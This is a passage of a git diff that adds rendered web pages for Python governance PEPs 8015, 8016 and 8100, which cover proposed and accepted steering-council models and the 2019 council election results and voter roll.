  • Replace the BDFL (Guido van Rossum) with a new “Python Steering +Committee” of 5 members which has limited roles: basically decide how +decisions are taken, but don’t take decisions.
  • +
+

PEPs are approved by a PEP delegate or by a vote (reserved to core +developers, need >= 2/3 majority).

+
+
+

PEP Rejection

+

PEP 8015 was rejected by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+

PEP 8016 and the governance model it describes were chosen instead.

+
+
+

Rationale

+

This PEP describes the organization of the whole Python development +community, from Python users to the Python Steering Committee. +Describing all groups and all roles in the same document helps to make +the organization more consistent.

+

The number of governance changes is minimized to get a smooth transition +from the old BDFL organization to the new Steering Committee +organization.

+

One key design of the organization is to avoid decision bottlenecks. +Discussions and decisions are distributed into Python teams where +experts in each topic can be found. The expectation is smoother +discussions on PEPs: fewer people with better knowledge of the topic.

+

Previously, most decisions have been taken by the Benevolent +Dictator For Life (BDFL), Guido van Rossum. The growing popularity of +Python increased the pressure on a single person. The proposed +organization distributes decisions and responsibilities to reduce the +pressure and avoid wearing any individual down.

+

To keep most of the decision power within the hands of the community, +the Python Steering Committee has very limited roles. The idea is to reduce the risk +that a group of people or companies “takes over” the Python project +through just a couple individuals. The project must remain autonomous +and open to everybody.

+

The most sensitives PEPs are decided by democracy: a vote reserved to +core developers, see the PEP process section below for the voting +method.

+
+
+

Common Guidelines

+
    +
  • The Python community is open to everyone.
  • +
  • Members must respect the Python Community Code of Conduct which ensures that +discussions remain constructive and that everybody feels welcomed.
  • +
  • Python is and will remain an autonomous project.
  • +
  • People with decisions power should reflect the diversity of its users +and contributors.
  • +
+
+
+

Community Organization

+

Right now, there are different group of people involved in the Python +project. The more involved you are, the more decisions power you get. It +is important that the people acceding to the deepest group are the most +trusted ones.

+

This PEP formalizes the following groups:

+
    +
  • Python Users
  • +
  • Python Contributors
  • +
  • Python Teams Members
  • +
  • Python Core Developers
  • +
  • Python Steering Committee Members
  • +
  • PSF Code of Conduct Workgroup
  • +
+
+
+

Python Users

+

This is the largest group: anyone who uses Python.

+
+
+

Python Contributors

+

Once a Python user sends an email to a Python mailing list, comments on +the Python bug tracker, proposes or reviews a Python change, they become +a Python contributor.

+
+
+

Python Teams

+

Python became too big to work as a unique team anymore, people +naturally have grouped themselves as teams to work more closely on +specific topics, sometimes called “Special Interest Group” (SIG).

+

When enough developers are interested by a specific topic, they can +create a new team. Usually, the main action is to ask the Python +postmaster to create a new “SIG” mailing list, but the team can choose +to use a different communication channel.

+

Team members are Python contributors and Python core developers. The +team is self-organized and is responsible to select who can join the +team and how.

+

Team members can get the bug triage permission on the team bug tracker +component. The more involved in a team you are, the more decisions power +and responsibilities you get.

+

A team might become allowed to decide on their own PEPs, but only the +Python Steering Committee can allow that (and it has the power to revoke +it as well). Such a case is exceptional, currently a single team has +such permission: the Packaging Team.

+

See Annex: Examples of Python Teams.

+
+
+

Python Core Developers

+

One restricted definition of a core developer is the ability to merge a +change (anywhere in the code) and have the bug triage permission +(on all bug tracker components).

+

Core developers are developers who are proven to have the required skills to +decide if a change can be approved or must be rejected, but also (and +this is more important) what changes should not be made. Python has a +long history, big constraints on backward compatibility, high quality +standards (ex: changes require new tests). For these reasons, becoming +a core can take several months or longer.

+

Becoming a core developer means more responsibilities. For example, if a +developer merges a change, they become responsible for regressions and +for the maintenance of that modified code.

+

Core developers are expected to be exemplary when it comes to the Code +of Conduct. They are encouraged to mentor contributors.

+
+

Promote a contributor as core developer

+

Once an existing core developer considers that a contributor is ready to +join the core group, to become a core developer, that core developer +asks the contributor if they would like to become a core developer. If +the contributor is interested in such new responsibilities, a vote is +organized.

+

The vote is reserved to core developers, is public, and is open for 1 +week. Usually the core developer who proposes the promotion has to +describe the work and skills of the candidate in the description of the +vote. A contributor is only promoted if two thirds (>= 2/3) of +votes approve (“+1”) the promotion. Only “+1” and “-1” votes are +accounted; other votes (ex: null, “-0”, “+0.5”) are ignored.

+

If the candidate is promoted, usually they get a mentor for 1 month to +help them to handle new responsibilities.

+

If the candidate is not promoted, a new vote can be organized later, +when the candidate gets the missing skills, for example 6 months later.

+
+
+
+

Python Steering Committee

+

The Python Steering Committee is made of the most trusted core +developers since it has the most decision power. The roles of this group +are strictly limited to ensure that Python keeps its autonomy and +remains open.

+

The Python Steering Committee is composed of 5 members. They are elected +for 3 years and 1/3 is replaced every year (first year: 1, second year: +2, third year: 2). This way, a member will stay for one full Python +release and the committee composition will be updated frequently. A +committee member can be a candidate for the seat they are leaving. +There are no term limits.

+

Committee members must be Python core developers. It is important that +the members of the committee reflect the diversity of Python’ users and +contributors. A small step to ensure that is to enforce that only 2 +members (strictly less than 50% of the 5 members) can work for the same +employer (same company or subsidiaries of the same company).

+

The size of 5 members has been chosen for the members diversity and to +ensure that the committee can continue to work even if a member becomes +unavailable for an unknown duration.

+
+

Python Steering Committee Roles

+

Python Steering Committee roles:

+
    +
  • Decide how a PEP is approved (or rejected or deferred).
  • +
  • Grant or revoke permissions to a Python team. For example, allow +a team to give the bug triage permission (on the team component) to a +contributor.
  • +
+

To decide how a PEP is approved (or rejected or deferred), there are two +options:

+
    +
  • The committee elects a PEP delegate (previously known as “BDFL-delegate”): +a core developer who will take the final decision for the specific +PEP. The committee select the PEP delegate who can be proposed by the +Python team where the PEP is discussed.
  • +
  • The committee can organize a vote on the PEP, see PEP process +for the vote organization. The committee decides when the vote is +organized. A vote is preferred for changes affecting all Python users, +like language changes.
  • +
+

The committee keeps the “vision” and consistency of Python. It also makes +sure that important features reach completion. Their ability to pick PEP +delegates is meant to help them to achieve that goal.

+
+
+

Election of Python Steering Committee Members

+

The vote is organized by the Steering Committee. It is announced 3 weeks +in advance: candidates have to apply during this period. The vote is +reserved to core developers and is open for 1 week. To avoid +self-censorship, the vote uses secret ballots: avoid the risk of +hostility from someone who may get more power (if they get elected).

+

The vote uses the Schulze/Beatpath/CSSD variant of the Condorcet +method using an +online service like Condorcet Internet Voting Service (CIVS). This voting method reduces the risk of +tie. It also produces a ranking of all candidates, needed for the +creation of the committee.

+

In case of tie, a new vote is organized immediately between candidates +involved in the tie using the same voting method and also during 1 week. +If the second vote leads to a tie again, the current Steering Committee +is responsible to select the elected member(s).

+

If a committee member steps down, a new vote is organized to replace +them.

+

If the situation of a committee member changes in a way that no longer +satisfies the committee constraint (ex: they move to the same company as +two other committee members), they have to resign. If the employer of a +member is acquired by the employer of two other members, the member with +the mandate ending earlier has to resign once the acquisition completes.

+
+
+

Election Creating the Python Steering Committee Members

+

To bootstrap the process, 5 members are elected at the committee +creation. The vote follows the same rules than regular committee votes, +except that the election needs 5 members, and the vote is organized by +the PSF Board.

+

In a council election, if 3 of the top 5 vote-getters work for the +same employer, then whichever of them ranked lowest is disqualified +and the 6th-ranking candidate moves up into 5th place; this is +repeated until a valid council is formed.

+

In case of tie, a second vote is organized immediately between +candidates involved in the tie and following candidates to fill the +remaining seats. The vote follows the same rules as the regular +committee vote. If the second vote still result in a tie, the PSF Board +is responsible to elect members and decide their position in the vote +result.

+

The order in the vote result must be unique for elected members: #1 and +#2 are elected for 3 years, #2 and #3 for 2 years, and #5 for 1 year.

+

Example of vote result with a tie:

+
    +
  • A
  • +
  • B
  • +
  • C
  • +
  • D
  • +
  • E, F
  • +
  • G
  • +
  • +
+

The first 4 candidates (A, B, C and D) are elected immediately. If E +works for the same employer than two other elected member, F is also +elected. Otherwise, a second vote is organized for the 5th seat between +E and F.

+
+
+

Special Case: Steering Committee Members And PEPs

+

A committee member can be a PEP delegate.

+

A committee member can propose a PEP, but cannot be the PEP delegate of +their own PEP.

+

When the committee decides that a PEP must be voted, committee members +can vote as they are also core developers, but they don’t have more +power than other core developer.

+
+
+
+

PSF Code of Conduct Workgroup

+
+

Charter

+

The workgroup’s purpose is to foster a diverse and inclusive Python +community by enforcing the PSF code of conduct, along with providing +guidance and recommendations to the Python community on codes of +conduct, that supports the PSF mission of “ongoing development of +Python-related technology and educational resources”.

+

We work toward this common goal in three ways:

+
    +
  • Review, revise, and advise on policies relating to the PSF code of +conducts and other communities that the PSF supports. This includes +any #python chat community & python.org email list under PSF +jurisdiction.
  • +
  • Create a standard set of codes of conduct and supporting documents for +multiple channels of interaction such as, but not limited to, +conferences, mailing lists, slack/IRC, code repositories, and more.
  • +
  • Develop training materials and other processes to support Python +community organizers in implementing and enforcing the code of +conduct.
  • +
+

The organization of this workgroup is defined by the +ConductWG Charter.

+
+
+

Special Case: Ban a core developer

+

As any other member of the Python community, the PSF Code of Conduct +Workgroup can ban a core developer for a limited amount of time. In this +case, the core developer immediately loses their core developer status. +Core developers are expected to be exemplary when it comes to the Code +of Conduct.

+

In general, a ban is only the last resort action when all other options +have been exhausted.

+

At the end of the ban, the developer is allowed to contribute again as a +regular contributor.

+

If the developer changes their behavior, another core developer can +organize a new vote to propose the developer for promotion to core +developer. The vote follows the same process than for any other Python +contributor.

+
+
+
+

PEP process

+

There are 2 main roles on PEPs:

+
    +
  • PEP Authors
  • +
  • PEP Delegate
  • +
+

PEP Authors do their best to write high quality PEP.

+

The PEP delegate is responsible to help the authors to enhance their PEP +and is the one taking the final decision (accept, reject or defer the +PEP). They can also help to guide the discussion.

+

If no decision is taken, the authors can propose again the PEP later +(ex: one year later), if possible with new data to motivate the change. A +PEP Delegate can also choose to mark a PEP as “Deferred” to not reject +the PEP and encourage to reopen the discussion later.

+

PEPs specific to a Python team are discussed on the team mailing list. +PEPs impacting all Python developers (like language changes) must be +discussed on the python-dev mailing list.

+
+

Vote on a PEP

+

When the Python Steering Committee decides that a PEP needs a wider +approval, a vote is organized.

+

The vote is reserved to core developers, is public, is announced 1 week +in advance, and is open for 1 week. The PEP can still be updated during +the 1 week notice, but must not be modified during the vote. Such vote +happens on +the mailing list where the PEP has been discussed. The committee decides +when the vote is organized. The PEP must have been discussed for a +reasonable amount of time before it is put to vote.

+

A PEP is only approved if two thirds (>= 2/3) of votes approve +(“+1”) the PEP. Only “+1” and “-1” votes are accounted; other votes +(ex: null, “-0”, “+0.5”) are ignored.

+

A PEP can only be approved or rejected by a vote, not be deferred.

+
+
+
+

Lack of Decision

+

If a discussion fails to reach a consensus, if the Python Steering +Committee fail to choose a PEP delegate, or if a PEP delegate fails to +take a decision, the obvious risk is that Python fails to evolve.

+

That’s fine. Sometimes, doing nothing is the wisest choice.

+
+
+

Change this PEP

+

The first version of this PEP has been written after Guido van Rossum +decided to resign from his role of BDFL in July 2018. Before this PEP, +the roles of Python community members have never been formalized. It is +difficult to design a perfect organization at the first attempt. This +PEP can be updated in the future to adjust the organization, specify how +to handle corner cases and fix mistakes.

+

Any change to this PEP must be validated by a vote. The vote is +announced 3 weeks in advance, is reserved to core developers, happens in +public on the python-committers mailing list, and is open for 1 week. +The proposed PEP change can still be updated during the 3 weeks notice, +but must not be modified during the vote.

+

The change is only approved if four fifths (>= 4/5) of votes approve +(“+1”) the change. Only “+1” and “-1” votes are accounted; other votes +(ex: null, “-0”, “+0.5”) are ignored.

+
+
+

Annex: Summary on votes

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
VoteNoticeOpenBallotMethod
Promote contributornone1 weekpublic>= 2/3 majority
PEP1 week1 weekpublic>= 2/3 majority
Change this PEP3 weeks1 weekpublic>= 4/5 majority
Steering Committee3 weeks1 weekprivateCondorcet (Schulze/Beatpath/CSSD)
+

All these votes are reserved to core developers.

+
+
+

Annex: Examples of Python Teams

+

Below are examples of some Python teams (the list will not be kept up to +date in this PEP).

+
+

Packaging Team

+

The packaging team runs its own PEP category and can approve (or reject) +their own PEPs.

+
    +
  • Website: packaging.python.org
  • +
  • Mailing list: distutils-sig
  • +
  • Bug tracker component: Distutils
  • +
  • Example of members: Paul Moore, Alyssa Coghlan, Donald Stuff
  • +
  • Stdlib module: distutils
  • +
  • Current PEP delegate: Paul Moore
  • +
+
+
+

IDLE Team

+

IDLE is a special case in the Python standard library: it’s a whole +application, not just a module. For this reason, it has been decided +that the code will be the same in all Python stable branches (whereas +the stdlib diverges in newer stable branches).

+
    +
  • Bug tracker component: IDLE
  • +
  • Example of members: Terry Reedy, Cheryl Sabella, Serhiy Storchaka
  • +
  • Stdlib module: idlelib
  • +
+
+
+

Mentorship Team

+

Becoming a core developer is long and slow process. Mentorship is an +efficient way to train contributors as future core developers and build +a trust relationship.

+ +

Note: The group is not responsible to promote core developers.

+
+
+

Documentation Team

+
    +
  • Mailing list: doc-sig
  • +
  • Bug tracker component: Documentation
  • +
  • GitHub tag: type-doc
  • +
  • Example of members: Julien Palard, INADA Naoki, Raymond Hettinger.
  • +
+

The team also manages documentation translations.

+

See also the Mentorship team which maintains the “Devguide”.

+
+
+

Security Team

+
    +
  • Website: https://www.python.org/news/security/
  • +
  • Mailing lists:
      +
    • security@python.org (to report vulnerabilities)
    • +
    • security-sig +(public list)
    • +
    +
  • +
  • Stdlib modules: hashlib, secrets and ssl
  • +
  • Example of members: Christian Heimes, Benjamin Peterson
  • +
+

The security@python.org mailing list is invite-only: only members of +the “Python Security Response Team” (PSRT) can read emails and reply; +whereas security-sig is public.

+

Note: This team rarely proposed PEPs.

+
+
+

Performance Team

+ +

Usually PEPs involving performance impact everybody and so are discussed +on the python-dev mailing list, rather than the speed mailing list.

+
+
+

Asynchronous Programming Team

+ +

PEP only modifying asyncio and contextvars can be discussed on +the async-sig mailing list, whereas changes impacting the Python +language must be discussed on python-dev.

+
+
+

Type Hints Team

+ +

Note: There is a backport for Python 3.6 and older, see +typing on PyPI.

+
+
+
+

Version History

+

History of this PEP:

+
    +
  • Version 7: Adjust the Steering Committee
      +
    • The Steering Committee is now made of 5 people instead of 3.
    • +
    • There are no term limits (instead of a limit of 2 mandates: +6 years in total).
    • +
    • A committee member can now be a PEP delegate.
    • +
    +
  • +
  • Version 6: Adjust votes
      +
    • Specify the Condorcet method: use Schulze/Beatpath/CSSD variant to +elect Python Steering Committee members. Specify how to deal with +tie and the constraint on the employers.
    • +
    • Vote on promoting a contributor and on PEPs now requires >= 2/3 +rather than 50%+1.
    • +
    • Vote on changing this PEP now requires >= 4/5 rather than +50%+1.
    • +
    • Explain how to deal with a company acquisition.
    • +
    +
  • +
  • Version 5: Election of Python Steering Committee Members uses secret +ballots
  • +
  • Version 4:
      +
    • Adjust votes: open for 1 week instead of 1 month, and announced +in advance.
    • +
    • Rename the “Python Core Board” to the “Python Steering Committee”;
    • +
    • Clarify that this committee doesn’t approve PEPs and that committee +members cannot cumulate more than 2 mandates;
    • +
    • Add the “Type Hints” team to the annex.
    • +
    +
  • +
  • Version 3: Add “Special Case: Ban a core developer” and “How to update +this PEP” sections.
  • +
  • Version 2: Rename the “Python board” to the “Python Core Board”, +to avoid confusion with the PSF Board.
  • +
  • Version 1: First version posted to python-committers and +discuss.python.org.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8015.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8016/index.html b/pep-8016/index.html new file mode 100644 index 00000000000..9c67001c928 --- /dev/null +++ b/pep-8016/index.html @@ -0,0 +1,471 @@ + + + + + + + + PEP 8016 – The Steering Council Model | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8016 – The Steering Council Model

+
+
Author:
+
Nathaniel J. Smith, Donald Stufft
+
Status:
+
Accepted
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
01-Nov-2018
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP is retained for historical purposes, but the official +governance document is now PEP 13.

+
+
+

Abstract

+

This PEP proposes a model of Python governance based around a steering +council. The council has broad authority, which they seek to exercise +as rarely as possible; instead, they use this power to establish +standard processes, like those proposed in the other 801x-series PEPs. +This follows the general philosophy that it’s better to split up large +changes into a series of small changes that can be reviewed +independently: instead of trying to do everything in one PEP, we focus +on providing a minimal-but-solid foundation for further governance +decisions.

+
+
+

PEP Acceptance

+

PEP 8016 was accepted by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+
+
+

Rationale

+

The main goals of this proposal are:

+
    +
  • Be boring: We’re not experts in governance, and we don’t think +Python is a good place to experiment with new and untried governance +models. So this proposal sticks to mature, well-known, previously +tested processes as much as possible. The high-level approach of a +mostly-hands-off council is arguably the most common across large +successful F/OSS projects, and low-level details are derived +directly from Django’s governance.
  • +
  • Be simple: We’ve attempted to pare things down to the minimum +needed to make this workable: the council, the core team (who elect +the council), and the process for changing the document. The goal is +Minimum Viable Governance.
  • +
  • Be comprehensive: But for the things we need to define, we’ve +tried to make sure to cover all the bases, because we don’t want to +go through this kind of crisis again. Having a clear and unambiguous +set of rules also helps minimize confusion and resentment.
  • +
  • Be flexible and light-weight: We know that it will take time and +experimentation to find the best processes for working together. By +keeping this document as minimal as possible, we keep maximal +flexibility for adjusting things later, while minimizing the need +for heavy-weight and anxiety-provoking processes like whole-project +votes.
  • +
+

A number of details were discussed in this Discourse thread, +and then this thread has further discussion. These +may be useful to anyone trying to understand the rationale for various +minor decisions.

+
+
+

Specification

+
+

The steering council

+
+

Composition

+

The steering council is a 5-person committee.

+
+
+

Mandate

+

The steering council shall work to:

+
    +
  • Maintain the quality and stability of the Python language and +CPython interpreter,
  • +
  • Make contributing as accessible, inclusive, and sustainable as +possible,
  • +
  • Formalize and maintain the relationship between the core team and +the PSF,
  • +
  • Establish appropriate decision-making processes for PEPs,
  • +
  • Seek consensus among contributors and the core team before acting in +a formal capacity,
  • +
  • Act as a “court of final appeal” for decisions where all other +methods have failed.
  • +
+
+
+

Powers

+

The council has broad authority to make decisions about the project. +For example, they can:

+
    +
  • Accept or reject PEPs
  • +
  • Enforce or update the project’s code of conduct
  • +
  • Work with the PSF to manage any project assets
  • +
  • Delegate parts of their authority to other subcommittees or +processes
  • +
+

However, they cannot modify this PEP, or affect the membership of the +core team, except via the mechanisms specified in this PEP.

+

The council should look for ways to use these powers as little as +possible. Instead of voting, it’s better to seek consensus. Instead of +ruling on individual PEPs, it’s better to define a standard process +for PEP decision making (for example, by accepting one of the other +801x series of PEPs). It’s better to establish a Code of Conduct +committee than to rule on individual cases. And so on.

+

To use its powers, the council votes. Every council member must either +vote or explicitly abstain. Members with conflicts of interest on a +particular vote must abstain. Passing requires support from a majority +of non-abstaining council members.

+

Whenever possible, the council’s deliberations and votes shall be held +in public.

+
+
+

Electing the council

+

A council election consists of two phases:

+
    +
  • Phase 1: Candidates advertise their interest in serving. Candidates +must be nominated by a core team member. Self-nominations are +allowed.
  • +
  • Phase 2: Each core team member can vote for zero to five of the +candidates. Voting is performed anonymously. Candidates are ranked +by the total number of votes they receive. If a tie occurs, it may +be resolved by mutual agreement among the candidates, or else the +winner will be chosen at random.
  • +
+

Each phase lasts one to two weeks, at the outgoing council’s discretion. +For the initial election, both phases will last two weeks.

+

The election process is managed by a returns officer nominated by the +outgoing steering council. For the initial election, the returns +officer will be nominated by the PSF Executive Director.

+

The council should ideally reflect the diversity of Python +contributors and users, and core team members are encouraged to vote +accordingly.

+
+
+

Term

+

A new council is elected after each feature release. Each council’s +term runs from when their election results are finalized until the +next council’s term starts. There are no term limits.

+
+
+

Vacancies

+

Council members may resign their position at any time.

+

Whenever there is a vacancy during the regular council term, the +council may vote to appoint a replacement to serve out the rest of the +term.

+

If a council member drops out of touch and cannot be contacted for a +month or longer, then the rest of the council may vote to replace +them.

+
+
+

Conflicts of interest

+

While we trust council members to act in the best interests of Python +rather than themselves or their employers, the mere appearance of any +one company dominating Python development could itself be harmful and +erode trust. In order to avoid any appearance of conflict of interest, +at most 2 members of the council can work for any single employer.

+

In a council election, if 3 of the top 5 vote-getters work for the +same employer, then whichever of them ranked lowest is disqualified +and the 6th-ranking candidate moves up into 5th place; this is +repeated until a valid council is formed.

+

During a council term, if changing circumstances cause this rule to be +broken (for instance, due to a council member changing employment), +then one or more council members must resign to remedy the issue, and +the resulting vacancies can then be filled as normal.

+
+
+

Ejecting core team members

+

In exceptional circumstances, it may be necessary to remove someone +from the core team against their will. (For example: egregious and +ongoing code of conduct violations.) This can be accomplished by a +steering council vote, but unlike other steering council votes, this +requires at least a two-thirds majority. With 5 members voting, this +means that a 3:2 vote is insufficient; 4:1 in favor is the minimum +required for such a vote to succeed. In addition, this is the one +power of the steering council which cannot be delegated, and this +power cannot be used while a vote of no confidence is in process.

+

If the ejected core team member is also on the steering council, then +they are removed from the steering council as well.

+
+
+

Vote of no confidence

+

In exceptional circumstances, the core team may remove a sitting +council member, or the entire council, via a vote of no confidence.

+

A no-confidence vote is triggered when a core team member calls for +one publicly on an appropriate project communication channel, and +another core team member seconds the proposal.

+

The vote lasts for two weeks. Core team members vote for or against. +If at least two thirds of voters express a lack of confidence, then +the vote succeeds.

+

There are two forms of no-confidence votes: those targeting a single +member, and those targeting the council as a whole. The initial call +for a no-confidence vote must specify which type is intended. If a +single-member vote succeeds, then that member is removed from the +council and the resulting vacancy can be handled in the usual way. If +a whole-council vote succeeds, the council is dissolved and a new +council election is triggered immediately.

+
+
+
+

The core team

+
+

Role

+

The core team is the group of trusted volunteers who manage Python. +They assume many roles required to achieve the project’s goals, +especially those that require a high level of trust. They make the +decisions that shape the future of the project.

+

Core team members are expected to act as role models for the community +and custodians of the project, on behalf of the community and all +those who rely on Python.

+

They will intervene, where necessary, in online discussions or at +official Python events on the rare occasions that a situation arises +that requires intervention.

+

They have authority over the Python Project infrastructure, including +the Python Project website itself, the Python GitHub organization and +repositories, the bug tracker, the mailing lists, IRC channels, etc.

+
+
+

Prerogatives

+

Core team members may participate in formal votes, typically to nominate new +team members and to elect the steering council.

+
+
+

Membership

+

Python core team members demonstrate:

+
    +
  • a good grasp of the philosophy of the Python Project
  • +
  • a solid track record of being constructive and helpful
  • +
  • significant contributions to the project’s goals, in any form
  • +
  • willingness to dedicate some time to improving Python
  • +
+

As the project matures, contributions go beyond code. Here’s an +incomplete list of areas where contributions may be considered for +joining the core team, in no particular order:

+
    +
  • Working on community management and outreach
  • +
  • Providing support on the mailing lists and on IRC
  • +
  • Triaging tickets
  • +
  • Writing patches (code, docs, or tests)
  • +
  • Reviewing patches (code, docs, or tests)
  • +
  • Participating in design decisions
  • +
  • Providing expertise in a particular domain (security, i18n, etc.)
  • +
  • Managing the continuous integration infrastructure
  • +
  • Managing the servers (website, tracker, documentation, etc.)
  • +
  • Maintaining related projects (alternative interpreters, core +infrastructure like packaging, etc.)
  • +
  • Creating visual designs
  • +
+

Core team membership acknowledges sustained and valuable efforts that +align well with the philosophy and the goals of the Python project.

+

It is granted by receiving at least two-thirds positive votes in a +core team vote and no veto by the steering council.

+

Core team members are always looking for promising contributors, +teaching them how the project is managed, and submitting their names +to the core team’s vote when they’re ready.

+

There’s no time limit on core team membership. However, in order to +provide the general public with a reasonable idea of how many people +maintain Python, core team members who have stopped contributing are +encouraged to declare themselves as “inactive”. Those who haven’t made +any non-trivial contribution in two years may be asked to move +themselves to this category, and moved there if they don’t respond. To +record and honor their contributions, inactive team members will +continue to be listed alongside active core team members; and, if they +later resume contributing, they can switch back to active status at +will. While someone is in inactive status, though, they lose their +active privileges like voting or nominating for the steering council, +and commit access.

+

The initial active core team members will consist of everyone +currently listed in the “Python core” team on GitHub, and the +initial inactive members will consist of everyone else who has been a +committer in the past.

+
+
+
+

Changing this document

+

Changes to this document require at least a two-thirds majority of +votes cast in a core team vote.

+
+
+
+

TODO

+
    +
  • Lots of people contributed helpful suggestions and feedback; we +should check if they’re comfortable being added as co-authors
  • +
  • It looks like Aymeric Augustin wrote the whole Django doc, so +presumably holds copyright; maybe we should ask him if he’s willing +to release it into the public domain so our copyright statement +below can be simpler.
  • +
+
+
+

Acknowledgements

+

Substantial text was copied shamelessly from The Django project’s +governance document.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8016.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-8100/index.html b/pep-8100/index.html new file mode 100644 index 00000000000..47bdb71ab8d --- /dev/null +++ b/pep-8100/index.html @@ -0,0 +1,437 @@ + + + + + + + + PEP 8100 – January 2019 Steering Council election | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 8100 – January 2019 Steering Council election

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>, Ee Durbin <ee at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
03-Jan-2019
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the schedule and other details of the January +2019 election for the Python steering council, as specified in +PEP 13. This is the first steering council election.

+
+
+

Returns officer

+

In future elections, the returns officer will be appointed by the +outgoing steering council. Since this is the first election, we have +no outgoing steering council, and PEP 13 says that the returns officer +is instead appointed by the PSF Executive Director, Ewa Jodlowska. +She appointed Ee Durbin.

+
+
+

Schedule

+

There will be a two-week nomination period, followed by a two-week +vote.

+

The nomination period is: January 7, 2019 through January 20, 2019

+

The voting period is: January 21, 2019 12:00 UTC through February 4, 2019 12:00 +UTC (The end of February 3, 2019 Anywhere on Earth)

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Once the nomination period opens, candidates will be listed here:

+
    +
  1. Brett Cannon
  2. +
  3. Alyssa (Nick) Coghlan
  4. +
  5. Barry Warsaw
  6. +
  7. Guido van Rossum
  8. +
  9. Victor Stinner
  10. +
  11. Yury Selivanov
  12. +
  13. David Mertz
  14. +
  15. Łukasz Langa
  16. +
  17. Benjamin Peterson
  18. +
  19. Mariatta
  20. +
  21. Carol Willing
  22. +
  23. Emily Morehouse
  24. +
  25. Peter Wang
  26. +
  27. Donald Stufft
  28. +
  29. Travis Oliphant
  30. +
  31. Kushal Das
  32. +
  33. Gregory P. Smith
  34. +
+
+
+

Voter Roll

+

All active Python core team members are eligible to vote.

+

Ballots will be distributed based on the The Python Voter Roll for this +election +[1].

+

While this file is not public as it contains private email addresses, the +Complete Voter Roll by name is available.

+
+
+

Election Implementation

+

The election will be conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2019-python-steering-committee

+

Name: 2019 Python Steering Committee Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is the first steering council election.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: ee@python.org

+

Voting starts at: January 21, 2019 12:00 UTC

+

Voting ends at: February 4, 2019 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public, only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and 5 answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of the 96 eligible voters, 69 cast ballots.

+

The top five vote-getters are:

+
    +
  • Barry Warsaw
  • +
  • Brett Cannon
  • +
  • Carol Willing
  • +
  • Guido van Rossum
  • +
  • Alyssa (Nick) Coghlan
  • +
+

No conflict of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
CandidateVotes Received
Guido van Rossum45
Brett Cannon44
Carol Willing33
Barry Warsaw31
Alyssa (Nick) Coghlan25
Benjamin Peterson22
Łukasz Langa21
Victor Stinner21
Mariatta20
Emily Morehouse18
Yury Selivanov15
Donald Stufft11
Peter Wang10
Travis Oliphant8
Kushal Das7
Gregory P. Smith6
David Mertz3
+
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Alex Gaynor
+Alex Martelli
+Alexander Belopolsky
+Alexandre Vassalotti
+Amaury Forgeot d'Arc
+Andrew Kuchling
+Andrew Svetlov
+Antoine Pitrou
+Armin Ronacher
+Barry Warsaw
+Benjamin Peterson
+Berker Peksag
+Brett Cannon
+Brian Curtin
+Carol Willing
+Chris Jerdonek
+Chris Withers
+Christian Heimes
+David Malcolm
+David Wolever
+Davin Potts
+Dino Viehland
+Donald Stufft
+Doug Hellmann
+Eli Bendersky
+Emily Morehouse
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Ethan Furman
+Ezio Melotti
+Facundo Batista
+Fred Drake
+Georg Brandl
+Giampaolo Rodola'
+Gregory P. Smith
+Guido van Rossum
+Hyeshik Chang
+Hynek Schlawack
+INADA Naoki
+Ivan Levkivskyi
+Jack Diederich
+Jack Jansen
+Jason R. Coombs
+Jeff Hardy
+Jeremy Hylton
+Jesús Cea
+Julien Palard
+Kurt B. Kaiser
+Kushal Das
+Larry Hastings
+Lars Gustäbel
+Lisa Roach
+Łukasz Langa
+Marc-Andre Lemburg
+Mariatta
+Mark Dickinson
+Mark Hammond
+Mark Shannon
+Martin Panter
+Matthias Klose
+Meador Inge
+Michael Hudson-Doyle
+Nathaniel J. Smith
+Ned Deily
+Neil Schemenauer
+Alyssa Coghlan
+Pablo Galindo
+Paul Moore
+Petr Viktorin
+Petri Lehtinen
+Philip Jenvey
+R. David Murray
+Raymond Hettinger
+Robert Collins
+Ronald Oussoren
+Sandro Tosi
+Senthil Kumaran
+Serhiy Storchaka
+Sjoerd Mullender
+Stefan Krah
+Steve Dower
+Steven Daprano
+T. Wouters
+Tal Einat
+Terry Jan Reedy
+Thomas Heller
+Tim Golden
+Tim Peters
+Trent Nelson
+Victor Stinner
+Vinay Sajip
